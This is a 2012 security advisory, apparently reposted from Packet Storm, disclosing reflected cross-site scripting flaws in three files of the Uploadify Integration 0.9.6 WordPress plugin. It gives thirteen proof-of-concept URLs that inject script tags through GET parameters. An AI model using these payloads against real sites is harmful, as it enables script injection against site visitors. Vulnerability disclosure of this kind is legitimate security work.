Uploadify Integration 0.9.6 Cross Site Scripting

2012-04-10T00:00:00
ID PACKETSTORM:111683
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2012-04-10T00:00:00

Description

                                        
                                            `  
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 06. April 2012  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-85.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Uploadify Integration allows you to insert a jQuery uploadify uploader into your  
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user  
meta, an option, or temporary depending on the metaType selected by the shortcode.  
Allows more than one shortcode per page.  
  
http://wordpress.org/extend/plugins/uploadify-integration/  
  
  
Vulnerable versions  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected is Uploadify Integration 0.9.6, older versions may be affected as well.  
  
  
###############################################################################  
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"  
###############################################################################  
  
Reason: outputting html data without proper encoding  
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
  
  
###############################################################################  
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"  
###############################################################################  
  
Reason: outputting html data without proper encoding  
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
  
  
###############################################################################  
3. Reflected XSS vulnerability in "views/scripts/file/error.php"  
###############################################################################  
  
Reason: outputting html data without proper encoding  
Attack vector: user submitted GET or POST parameters  
Preconditions: "register_globals=On"  
Result: XSS attack possibilities  
  
Tests:  
  
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/  
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>  
  
Result: XSS payload execution can be observed  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
Random project: http://albumnow.com/  
---------------------------------- [ EOF ] ------------------------------------  
`